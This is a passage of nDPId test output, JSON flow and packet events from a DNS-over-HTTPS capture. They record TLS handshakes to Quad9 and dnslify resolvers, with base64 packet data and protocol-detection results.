-02345{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pOrzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkCSEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R88DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"thread_ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBkiSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6lHCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgWwWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxywR21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgmbMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTIdMvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJbpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 